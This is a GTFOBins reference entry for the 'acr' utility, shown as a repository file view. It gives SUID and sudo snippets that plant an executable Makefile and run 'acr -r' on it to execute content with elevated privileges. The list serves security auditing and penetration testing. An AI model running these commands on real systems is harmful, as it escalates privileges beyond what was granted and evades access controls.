GTFOBins.github.io/_gtfobins/acr.md
2024-05-02 14:56:29 +02:00

16 lines
344 B
Markdown

---
functions:
suid:
- code: |
sudo install acr $(which acr) .
touch Makefile && chmod +x Makefile
echo DATA > Makefile
./acr -r Makefile
sudo:
- code: |
sudo install acr $(which acr) .
touch Makefile && chmod +x Makefile
echo DATA > Makefile
sudo acr -r Makefile
---